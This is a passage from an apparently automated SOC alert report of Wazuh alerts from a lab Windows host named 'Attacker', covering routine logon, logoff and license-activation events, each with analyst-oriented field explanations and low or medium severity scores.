Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.6073282Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43459
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11484
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FC0D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.580+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.580+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.85865
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:51.9596326Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2363
Incremental log record number – handy for timeline order.

data.win.system.processID:  4720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.770+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.770+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – cardholder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.88161
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:27.0631332Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43460
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.981+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.981+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.95498
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:56.4510372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2365
Incremental log record number – handy for timeline order.

data.win.system.processID:  11828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:25.153+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:25.153+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – cardholder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533885.97820
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:40.9838207Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43462
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:25.367+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:25.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533885.105153
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:26.3848083Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2367
Incremental log record number – handy for timeline order.

data.win.system.processID:  1172
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:26Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:26Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:26.589+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:26.589+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.
